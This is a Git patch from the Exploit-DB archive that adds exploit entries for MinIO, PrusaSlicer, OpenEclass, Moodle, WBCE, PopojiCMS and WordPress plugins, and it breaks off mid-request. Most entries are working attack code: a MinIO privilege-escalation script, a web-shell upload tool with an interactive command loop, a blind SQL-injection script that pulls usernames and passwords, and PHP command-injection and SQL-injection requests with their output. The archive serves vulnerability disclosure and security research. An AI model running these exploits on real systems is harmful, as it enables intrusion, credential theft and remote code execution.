From aa67db6cea1b12874d10b4e505d26a4fd48f5c6c Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Sat, 13 Apr 2024 00:16:27 +0000 Subject: [PATCH] DB: 2024-04-13 15 changes to exploits/shellcodes/ghdb MinIO < 2024-01-31T20-20-33Z - Privilege Escalation PrusaSlicer 2.6.1 - Arbitrary code execution GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload HTMLy Version v2.9.6 - Stored XSS Moodle 3.10.1 - Authenticated Blind Time-Based SQL Injection - _sort_ parameter PopojiCMS Version 2.0.1 - Remote Command Execution Quick CMS v6.7 en 2023 - 'password' SQLi Service Provider Management System v1.0 - SQL Injection WBCE 1.6.0 - Unauthenticated SQL injection WBCE CMS Version 1.6.1 - Remote Command Execution (Authenticated) Wordpress Plugin Playlist for Youtube 1.32 - Stored Cross-Site Scripting (XSS) Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS) Ray OS v2.6.3 - Command Injection RCE(Unauthorized) Terratec dmx_6fire USB - Unquoted Service Path --- exploits/go/remote/51976.txt | 200 ++++++++++++++++++++++++ exploits/multiple/local/51983.txt | 32 ++++ exploits/php/webapps/51967.txt | 39 ----- exploits/php/webapps/51975.txt | 140 +++++++++++++++++ exploits/php/webapps/51979.txt | 9 ++ exploits/php/webapps/51981.txt | 36 +++++ exploits/php/webapps/51982.txt | 40 +++++ exploits/php/webapps/51984.py | 75 +++++++++ exploits/php/webapps/51985.txt | 56 +++++++ exploits/php/webapps/51986.txt | 75 +++++++++ exploits/php/webapps/51987.txt | 36 +++++ exploits/python/webapps/51978.txt | 96 ++++++++++++ exploits/windows_x86-64/local/51977.txt | 36 +++++ files_exploits.csv | 15 +- 14 files changed, 844 insertions(+), 41 deletions(-) create mode 100644 exploits/go/remote/51976.txt create mode 100644 exploits/multiple/local/51983.txt delete mode 100644 exploits/php/webapps/51967.txt create mode 100644 exploits/php/webapps/51975.txt create mode 100644 exploits/php/webapps/51979.txt create mode 100644 exploits/php/webapps/51981.txt create mode 100644 exploits/php/webapps/51982.txt create mode 100755 exploits/php/webapps/51984.py create mode 100644 exploits/php/webapps/51985.txt create mode 100644 exploits/php/webapps/51986.txt create mode 100644 exploits/php/webapps/51987.txt create mode 100644 exploits/python/webapps/51978.txt create mode 100644 exploits/windows_x86-64/local/51977.txt diff --git a/exploits/go/remote/51976.txt b/exploits/go/remote/51976.txt new file mode 100644 index 000000000..1d0d19130 --- /dev/null +++ b/exploits/go/remote/51976.txt @@ -0,0 +1,200 @@ +# Exploit Title: MinIO < 2024-01-31T20-20-33Z - Privilege Escalation +# Date: 2024-04-11 +# Exploit Author: Jenson Zhao +# Vendor Homepage: https://min.io/ +# Software Link: https://github.com/minio/minio/ +# Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z +# Tested on: Windows 10 +# CVE : CVE-2024-24747 +# Required before execution: pip install minio,requests + +import argparse +import datetime +import traceback +import urllib +from xml.dom.minidom import parseString +import requests +import json +import base64 +from minio.credentials import Credentials +from minio.signer import sign_v4_s3 + +class CVE_2024_24747: + new_buckets = [] + old_buckets = [] + def __init__(self, host, port, console_port, accesskey, secretkey, verify=False): + self.bucket_names = ['pocpublic', 'pocprivate'] + self.new_accesskey = 'miniocvepoc' + self.new_secretkey = 'MINIOcvePOC' + self.headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36', + 'Content-Type': 'application/json', + 'Accept': '*/*' + } + self.accesskey = accesskey + self.secretkey = secretkey + self.verify = verify + if verify: + self.url = "https://" + host + ":" + port + self.console_url = "https://" + host + ":" + console_port + else: + self.url = "http://" + host + ":" + port + self.console_url = "http://" + host + ":" + console_port + self.credits = Credentials( + access_key=self.new_accesskey, + secret_key=self.new_secretkey + ) + self.login() + try: + self.create_buckets() + self.create_accesskey() + self.old_buckets = self.console_ls() + self.console_exp() + self.new_buckets = self.console_ls() + + except: + traceback.print_stack() + finally: + self.delete_accesskey() + self.delete_buckets() + if len(self.new_buckets) > len(self.old_buckets): + print("There is CVE-2024-24747 problem with the minio!") + print("Before the exploit, the buckets are : " + str(self.old_buckets)) + print("After the exploit, the buckets are : " + str(self.new_buckets)) + else: + print("There is no CVE-2024-24747 problem with the minio!") + + def login(self): + url = self.url + "/api/v1/login" + payload = json.dumps({ + "accessKey": self.accesskey, + "secretKey": self.secretkey + }) + self.session = requests.session() + if self.verify: + self.session.verify = False + status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code + # print(status_code) + if status_code == 204: + status_code = 0 + else: + print('Login failed! Please check if the input accesskey and secretkey are correct!') + exit(1) + def create_buckets(self): + url = self.url + "/api/v1/buckets" + for name in self.bucket_names: + payload = json.dumps({ + "name": name, + "versioning": False, + "locking": False + }) + status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code + # print(status_code) + if status_code == 200: + status_code = 0 + else: + print("新建 (New)"+name+" bucket 失败 (fail)!") + def delete_buckets(self): + for name in self.bucket_names: + url = self.url + "/api/v1/buckets/" + name + status_code = self.session.request("DELETE", url, headers=self.headers).status_code + # print(status_code) + if status_code == 204: + status_code = 0 + else: + print("删除 (delete)"+name+" bucket 失败 (fail)!") + def create_accesskey(self): + url = self.url + "/api/v1/service-account-credentials" + payload = json.dumps({ + "policy": "{ \n \"Version\":\"2012-10-17\", \n \"Statement\":[ \n { \n \"Effect\":\"Allow\", \n \"Action\":[ \n \"s3:*\" \n ], \n \"Resource\":[ \n \"arn:aws:s3:::pocpublic\", \n \"arn:aws:s3:::pocpublic/*\" \n ] \n } \n ] \n}", + "accessKey": self.new_accesskey, + "secretKey": self.new_secretkey + }) + status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code + # print(status_code) + if status_code == 201: + # print("新建 (New)" + self.new_accesskey + " accessKey 成功 (success)!") + # print(self.new_secretkey) + status_code = 0 + else: + print("新建 (New)" + self.new_accesskey + " accessKey 失败 (fail)!") + def delete_accesskey(self): + url = self.url + "/api/v1/service-accounts/" + base64.b64encode(self.new_accesskey.encode("utf-8")).decode('utf-8') + status_code = self.session.request("DELETE", url, headers=self.headers).status_code + # print(status_code) + if status_code == 204: + # print("删除" + self.new_accesskey + " accessKey成功!") + status_code = 0 + else: + print("删除 (delete)" + self.new_accesskey + " accessKey 失败 (fail)!") + def headers_gen(self,url,sha256,method): + datetimes = datetime.datetime.utcnow() + datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ') + urls = urllib.parse.urlparse(url) + headers = { + 'X-Amz-Content-Sha256': sha256, + 'X-Amz-Date': datetime_str, + 'Host': urls.netloc, + } + headers = sign_v4_s3( + method=method, + url=urls, + region='us-east-1', + headers=headers, + credentials=self.credits, + content_sha256=sha256, + date=datetimes, + ) + return headers + def console_ls(self): + url = self.console_url + "/" + sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" + headers = self.headers_gen(url,sha256,'GET') + if self.verify: + response = requests.get(url,headers=headers,verify=False) + else: + response = requests.get(url, headers=headers) + DOMTree = parseString(response.text) + collection = DOMTree.documentElement + buckets = collection.getElementsByTagName("Bucket") + bucket_names = [] + for bucket in buckets: + bucket_names.append(bucket.getElementsByTagName("Name")[0].childNodes[0].data) + # print('当前可查看的bucket有:\n' + str(bucket_names)) + return bucket_names + + def console_exp(self): + url = self.console_url + "/minio/admin/v3/update-service-account?accessKey=" + self.new_accesskey + sha256 = "0f87fd59dff29507f82e189d4f493206ea7f370d0ce97b9cc8c1b7a4e609ec95" + headers = self.headers_gen(url, sha256, 'POST') + hex_string = "e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336" + content = bytes.fromhex(hex_string) + if self.verify: + response = requests.post(url,headers=headers,data=content,verify=False) + else: + response = requests.post(url,headers=headers,data=content) + status_code = response.status_code + if status_code == 204: + # print("提升" + self.new_accesskey + " 权限成功!") + status_code = 0 + else: + print("提升 (promote)" + self.new_accesskey + " 权限失败 (Permission failed)!") + +if __name__ == '__main__': + logo = """ + ____ ___ ____ _ _ ____ _ _ _____ _ _ _____ + ___ __ __ ___ |___ \ / _ \ |___ \ | || | |___ \ | || | |___ || || | |___ | + / __|\ \ / / / _ \ _____ __) || | | | __) || || |_ _____ __) || || |_ / / | || |_ / / +| (__ \ V / | __/|_____| / __/ | |_| | / __/ |__ _||_____| / __/ |__ _| / / |__ _| / / + \___| \_/ \___| |_____| \___/ |_____| |_| |_____| |_| /_/ |_| /_/ + """ + print(logo) + parser = argparse.ArgumentParser() + parser.add_argument("-H", "--host", required=True, help="Host of the target. example: 127.0.0.1") + parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin") + parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin") + parser.add_argument("-c", "--console_port", required=True, help="Minio console port of the target. example: 9000") + parser.add_argument("-p", "--port", required=True, help="Minio port of the target. example: 9090") + parser.add_argument("--https", action='store_true', help="Is MinIO accessed through HTTPS.") + args = parser.parse_args() + CVE_2024_24747(args.host,args.port,args.console_port,args.accesskey,args.secretkey,args.https) \ No newline at end of file diff --git a/exploits/multiple/local/51983.txt b/exploits/multiple/local/51983.txt new file mode 100644 index 000000000..8bbbf228a --- /dev/null +++ b/exploits/multiple/local/51983.txt @@ -0,0 +1,32 @@ +# Exploit Title: PrusaSlicer 2.6.1 - Arbitrary code execution on g-code export +# Date: 16/01/2024 +# Exploit Author: Kamil Breński +# Vendor Homepage: https://www.prusa3d.com +# Software Link: https://github.com/prusa3d/PrusaSlicer +# Version: PrusaSlicer up to and including version 2.6.1 +# Tested on: Windows and Linux +# CVE: CVE-2023-47268 + +========================================================================================== +1.) 3mf Metadata extension +========================================================================================== + +PrusaSlicer 3mf project (zip) archives contain the 'Metadata/Slic3r_PE.config' file which describe various project settings, this is an extension to the regular 3mf file. PrusaSlicer parses this additional file to read various project settings. One of the settings (post_process) is the post-processing script (https://help.prusa3d.com/article/post-processing-scripts_283913) this feature has great potential for abuse as it allows a malicious user to create an evil 3mf project that will execute arbitrary code when the targeted user exports g-code from the malicious project. A project file needs to be modified with a prost process script setting in order to execute arbitrary code, this is demonstrated on both a Windows and Linux host in the following way. + +========================================================================================== +2.) PoC +========================================================================================== + +For the linux PoC, this CLI command is enough to execute the payload contained in the project. './prusa-slicer -s code-exec-linux.3mf'. After slicing, a new file '/tmp/hax' will be created. This particular PoC contains this 'post_process' entry in the 'Slic3r_PE.config' file: + +``` +; post_process = "/usr/bin/id > /tmp/hax #\necho 'Here I am, executing arbitrary code on this host. Thanks for slicing (x_x)'>> /tmp/hax #" +``` + +Just slicing the 3mf using the `-s` flag is enough to start executing potentially malicious code. + +For the windows PoC with GUI, the malicious 3mf file needs to be opened as a project file (or the settings imported). After exporting, a pop-up executed by the payload will appear. The windows PoC contains this entry: + +``` +; post_process = "C:\\Windows\\System32\\cmd.exe /c msg %username% Here I am, executing arbitrary code on this host. Thanks for slicing (x_x) " +``` \ No newline at end of file diff --git a/exploits/php/webapps/51967.txt b/exploits/php/webapps/51967.txt deleted file mode 100644 index 77dc1f93f..000000000 --- a/exploits/php/webapps/51967.txt +++ /dev/null @@ -1,39 +0,0 @@ -# Title: Quick CMS v6.7 en 2023 - 'password' SQLi -# Author: nu11secur1ty -# Date: 03/19/2024 -# Vendor: https://opensolution.org/ -# Software: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip -# Reference: https://portswigger.net/web-security/sql-injection - -# Description: The password parameter is vulnerable for SQLi bypass authentication! - -[+]Payload: -```mysql -POST /admin.php?p=login HTTP/1.1 -Host: localpwnedhost.com -Cookie: PHPSESSID=39eafb1sh5tqbar92054jn1cqg -Content-Length: 92 -Cache-Control: max-age=0 -Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122" -Sec-Ch-Ua-Mobile: ?0 -Sec-Ch-Ua-Platform: "Windows" -Upgrade-Insecure-Requests: 1 -Origin: https://localpwnedhost.com -Content-Type: application/x-www-form-urlencoded -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 -(KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 -Accept: -text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Sec-Fetch-Site: same-origin -Sec-Fetch-Mode: navigate -Sec-Fetch-User: ?1 -Sec-Fetch-Dest: document -Referer: https://localpwnedhost.com/admin.php -Accept-Encoding: gzip, deflate, br -Accept-Language: en-US,en;q=0.9 -Priority: u=0, i -Connection: close - -sEmail=kurec%40guhai.mi.huq&sPass=%27+or+%271%27%3D%271&bAcceptLicense=1&iAcceptLicense=true - -``` \ No newline at end of file diff --git a/exploits/php/webapps/51975.txt b/exploits/php/webapps/51975.txt new file mode 100644 index 000000000..9636aedcf --- /dev/null +++ b/exploits/php/webapps/51975.txt @@ -0,0 +1,140 @@ +# Exploit Title: GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload +# Date: 2024-02-04 +# Exploit Author: Georgios Tsimpidas +# Vendor Homepage: https://www.openeclass.org/ +# Software Link: https://download.openeclass.org/files/3.15/ +# Version: 3.15 (2024) +# Tested on: Debian Kali (Apache/2.4.57, PHP 8.2.12, MySQL 15.1) +# CVE : CVE-2024-31777 +# GUnet OpenEclass <= 3.15 E-learning platform - Unrestricted File + +import requests +import argparse +import zipfile +import os +import sys + +RED = '\033[91m' +GREEN = '\033[92m' +YELLOW = '\033[93m' +RESET = '\033[0m' +ORANGE = '\033[38;5;208m' + +MALICIOUS_PAYLOAD = """\ + +""" + +def banner(): + print(f'''{RED} +{YELLOW} + ============================ Author: Frey ============================ +{RESET}''') + +def execute_command(openeclass, filename): + while True: + # Prompt for user input with "eclass" + cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}") + + # Check if the command is 'quit', then break the loop + if cmd.lower() == "quit": + print(f"{ORANGE}\nExiting...{RESET}") + clean_server(openeclass) + sys.exit() + + # Construct the URL with the user-provided command + url = f"{openeclass}/courses/user_progress_data/cert_templates/{filename}?cmd={cmd}" + + # Execute the GET request + try: + response = requests.get(url) + + # Check if the request was successful + if response.status_code == 200: + # Print the response text + print(f"{GREEN}{response.text}{RESET}") + + except requests.exceptions.RequestException as e: + # Print any error that occurs during the request + print(f"{RED}An error occurred: {e}{RESET}") + +def upload_web_shell(openeclass, username, password): + login_url = f'{openeclass}/?login_page=1' + login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php' + + # Login credentials + payload = { + 'next': '/main/portfolio.php', + 'uname': f'{username}', + 'pass': f'{password}', + 'submit': 'Enter' + } + + headers = { + 'Referer': login_page_url, + } + + # Use a session to ensure cookies are handled correctly + with requests.Session() as session: + # (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens + session.get(login_page_url) + + # Post the login credentials + response = session.post(login_url, headers=headers, data=payload) + + # Create a zip file containing the malicious payload + zip_file_path = 'malicious_payload.zip' + with zipfile.ZipFile(zip_file_path, 'w') as zipf: + zipf.writestr('evil.php', MALICIOUS_PAYLOAD.encode()) + + # Upload the zip file + url = f'{openeclass}/modules/admin/certbadge.php?action=add_cert' + files = { + 'filename': ('evil.zip', open(zip_file_path, 'rb'), 'application/zip'), + 'certhtmlfile': (None, ''), + 'orientation': (None, 'L'), + 'description': (None, ''), + 'cert_id': (None, ''), + 'submit_cert_template': (None, '') + } + response = session.post(url, files=files) + + # Clean up the zip file + os.remove(zip_file_path) + + # Check if the upload was successful + if response.status_code == 200: + print(f"{GREEN}Payload uploaded successfully!{RESET}") + return True + else: + print(f"{RED}Failed to upload payload. Exiting...{RESET}") + return False + +def clean_server(openeclass): + print(f"{ORANGE}Cleaning server...{RESET}") + # Remove the uploaded files + requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.zip") + requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.php") + print(f"{GREEN}Server cleaned successfully!{RESET}") + +def main(): + parser = argparse.ArgumentParser(description="Open eClass – CVE-CVE-2024-31777: Unrestricted File Upload Leads to Remote Code Execution") + parser.add_argument('-u', '--username', required=True, help="Username for login") + parser.add_argument('-p', '--password', required=True, help="Password for login") + parser.add_argument('-e', '--eclass', required=True, help="Base URL of the Open eClass") + args = parser.parse_args() + + banner() + # Running the main login and execute command function + if upload_web_shell(args.eclass, args.username, args.password): + execute_command(args.eclass, 'evil.php') + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/51979.txt b/exploits/php/webapps/51979.txt new file mode 100644 index 000000000..e41fd0484 --- /dev/null +++ b/exploits/php/webapps/51979.txt @@ -0,0 +1,9 @@ +# Exploit Title: HTMLy Version v2.9.6 - Stored XSS +# Exploit Author: tmrswrr +# Vendor Homepage: https://www.htmly.com/ +# Version 3.10.8.21 +# Date : 04/08/2024 + +1 ) Login admin https://127.0.0.1/HTMLy/admin/config +2 ) General Setting > Blog title > "> +3 ) After save it you will be see XSS alert \ No newline at end of file diff --git a/exploits/php/webapps/51981.txt b/exploits/php/webapps/51981.txt new file mode 100644 index 000000000..985ee0067 --- /dev/null +++ b/exploits/php/webapps/51981.txt @@ -0,0 +1,36 @@ +# Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS) +# Date: 22 March 2024 +# Exploit Author: Erdemstar +# Vendor: https://wordpress.com/ +# Version: 1.32 + +# Proof Of Concept: +1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID". + +# PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns +# Vulnerable Properties name: name, playlist_id +# Payload: "> +# Request: +POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2 +Host: erdemstar.local +Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9 +Content-Length: 178 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "macOS" +Upgrade-Insecure-Requests: 1 +Origin: https://erdemstar.local +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_free +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.9 +Priority: u=0, i + +_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name=">&playlist_id=123&template=1&text_size=123&text_color=%23000000 \ No newline at end of file diff --git a/exploits/php/webapps/51982.txt b/exploits/php/webapps/51982.txt new file mode 100644 index 000000000..39750c780 --- /dev/null +++ b/exploits/php/webapps/51982.txt @@ -0,0 +1,40 @@ +# Exploit Title: PopojiCMS Version : 2.0.1 Remote Command Execution +# Date: 27/11/2023 +# Exploit Author: tmrswrr +# Vendor Homepage: https://www.popojicms.org/ +# Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip +# Version: Version : 2.0.1 +# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS + +##POC: + +1 ) Login with admin cred and click settings +2 ) Click on config , write your payload in Meta Social > +3 ) Open main page , you will be see id command result + + +POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1 +Host: demos5.softaculous.com +Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7D +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=setting +Content-Type: application/x-www-form-urlencoded +Content-Length: 58 +Origin: https://demos5.softaculous.com +Dnt: 1 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers +Connection: close + +meta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3E + +Result: + +uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) \ No newline at end of file diff --git a/exploits/php/webapps/51984.py b/exploits/php/webapps/51984.py new file mode 100755 index 000000000..504901a8a --- /dev/null +++ b/exploits/php/webapps/51984.py @@ -0,0 +1,75 @@ +# Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter +# Google Dork: +# Date: 04/11/2023 +# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx) +# Vendor Homepage: https://moodle.org/ +# Software Link: +# Version: 3.10.1 +# Tested on: Linux +# CVE : CVE-2021-36393 + +import requests +import string +from termcolor import colored + +# Request details +URL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification" +HEADERS = { + "Accept": "application/json, text/javascript, */*; q=0.01", + "Content-Type": "application/json", + "X-Requested-With": "XMLHttpRequest", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36", + "Origin": "http://127.0.0.1:8080", + "Referer": "http://127.0.0.1:8080/moodle/my/", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "en-US,en;q=0.9", + "Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0", + "Connection": "close" +} + +# Characters to test +characters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/" + +def test_character(payload): + response = requests.post(URL, headers=HEADERS, json=[payload]) + return response.elapsed.total_seconds() >= 3 + +def extract_value(column, label): + base_payload = { + "index": 0, + "methodname": "core_course_get_enrolled_courses_by_timeline_classification", + "args": { + "offset": 0, + "limit": 0, + "classification": "all", + "sort": "", + "customfieldname": "", + "customfieldvalue": "" + } + } + + result = "" + for _ in range(50): # Assumes a maximum of 50 characters for the value + character_found = False + for character in characters_to_test: + if column == "database()": + base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)" + else: + base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)" + + if test_character(base_payload): + result += character + print(colored(f"{label}: {result}", 'red'), end="\r") + character_found = True + break + + if not character_found: + break + + # Print the final result + print(colored(f"{label}: {result}", 'red')) + +if __name__ == "__main__": + extract_value("database()", "Database") + extract_value("username", "Username") + extract_value("password", "Password") \ No newline at end of file diff --git a/exploits/php/webapps/51985.txt b/exploits/php/webapps/51985.txt new file mode 100644 index 000000000..a4c67133f --- /dev/null +++ b/exploits/php/webapps/51985.txt @@ -0,0 +1,56 @@ +# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0 +# Date: 15.11.2023 +# Exploit Author: young pope +# Vendor Homepage: https://github.com/WBCE/WBCE_CMS +# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip +# Version: 1.6.0 +# Tested on: Kali linux +# CVE : CVE-2023-39796 + +There is an sql injection vulnerability in *miniform* module which is a +default module installed in the *WBCE* cms. It is an unauthenticated +sqli so anyone could access it and takeover the whole database. + +In file /modules/miniform/ajax_delete_message.php there is no +authentication check. On line |40| in this file, there is a |DELETE| +query that is vulnerable, an attacker could jump from the query using +tick sign - ```. + +Function |addslashes()| +(https://www.php.net/manual/en/function.addslashes.php) escapes only +these characters and not a tick sign: + + * single quote (') + * double quote (") + * backslash () + * NUL (the NUL byte + +The DB_RECORD_TABLE parameter is vulnerable. + +If an unauthenticated attacker send this request: + +``` + +POST /modules/miniform/ajax_delete_message.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, +like Gecko) Chrome/36.0.1985.125 Safari/537.36 +Connection: close +Content-Length: 162 +Accept: */* +Accept-Language: en +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate + +action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record + +``` + +The response is received after 6s. + +Reference links: + + * https://nvd.nist.gov/vuln/detail/CVE-2023-39796 + * https://forum.wbce.org/viewtopic.php?pid=42046#p42046 + * https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1 + * https://pastebin.com/PBw5AvGp \ No newline at end of file diff --git a/exploits/php/webapps/51986.txt b/exploits/php/webapps/51986.txt new file mode 100644 index 000000000..2fdc861f1 --- /dev/null +++ b/exploits/php/webapps/51986.txt @@ -0,0 +1,75 @@ +# Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution +# Date: 30/11/2023 +# Exploit Author: tmrswrr +# Vendor Homepage: https://wbce-cms.org/ +# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip +# Version: 1.6.1 +# Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS + +## POC: + +1 ) Login with admin cred and click Add-ons +2 ) Click on Language > Install Language > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php +3 ) Upload upgrade.php > , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php +4 ) You will be see id command result + +Result: + +uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) + +### Post Request: + +POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1 +Host: demos6.softaculous.com +Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; 